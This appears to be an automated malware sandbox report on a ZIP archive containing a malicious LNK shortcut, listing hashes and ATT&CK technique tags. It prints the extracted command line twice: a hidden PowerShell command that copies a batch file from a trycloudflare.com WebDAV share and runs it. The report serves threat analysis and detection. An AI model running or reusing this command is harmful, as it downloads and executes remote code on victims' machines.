Malicious
faa07de0cff3dcc6655b76d879b2585c6908f7[...]ece.zip
ZIP Archive | MD5: 1e73e75482f1e0c01ffa49154a84143a | Size: 1.38 KB | application/zip
ZIP Archive
MD5: 1e73e75482f1e0c01ffa49154a84143a
Size: 1.38 KB
application/zip
Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | 1e73e75482f1e0c01ffa49154a84143a
|
| Sha1 | b2e5e4abc6ce89b72a9bbd2c96ca71561daa8516
|
| Sha256 | 413b5516a370863bdd5d2e05d5b7b75592014533e9582afbd821ecd037445ef8
|
| Sha384 | e35519ef829ef2bb9f91039407ef11445cc314213038b3706b9750046dc9266a27cc33ffd9a459b1ba12c7c57a9a6cef
|
| Sha512 | 59b68ed770026ae129236f4fd655367641eb54ee542ad0a72dd8c26b7c6b9cecff97bb7a8d3e1f45bca808f97a10e3a560a72f5b6a1fd0dba396f4844e841224
|
| SSDeep | 24:Sdo4LOBK8VwbS6jfNtYU9FeRfRoHc42KwtnyijDWkNQvQf1h4do4LOw:A/LOBK82b3DNmWsxRokKwgQDbNQvQNUh
|
| TLSH | 1521B6A2569E4808C112AC7216AB675ACE232B7EAC7AE0356588927418524E28CEC85A
|
File Structure
faa07de0cff3dcc6655b76d879b2585c6908f72d77b03bed64d0dcb5297e2ece.zip
Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
faa07de0cff3dcc6655b76d879b2585c6908f72d77b03bed64d0dcb5297e2ece.lnk
Archive Entry
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Powershell: Hidden Execution
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Lnk Summary]
Malicious
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -w hidden -c "Copy-Item '\\louise-monitors-mo-rating.trycloudflare.com@SSL\DavWWWRoot\bas.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\bas.bat\" -WindowStyle Hidden" |
faa07de0cff3dcc6655b76d879b2585c6908f72d77b03bed64d0dcb5297e2ece.zip (1.38 KB)
File Structure
faa07de0cff3dcc6655b76d879b2585c6908f72d77b03bed64d0dcb5297e2ece.zip
Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
faa07de0cff3dcc6655b76d879b2585c6908f72d77b03bed64d0dcb5297e2ece.lnk
Archive Entry
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Powershell: Hidden Execution
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -w hidden -c "Copy-Item '\\louise-monitors-mo-rating.trycloudflare.com@SSL\DavWWWRoot\bas.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\bas.bat\" -WindowStyle Hidden" Malicious |
faa07de0cff3dcc6655b76d879b2585c6908f72d77b03bed64d0dcb5297e2ece.zip > faa07de0cff3dcc6655b76d879b2585c6908f72d77b03bed64d0dcb5297e2ece.lnk |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.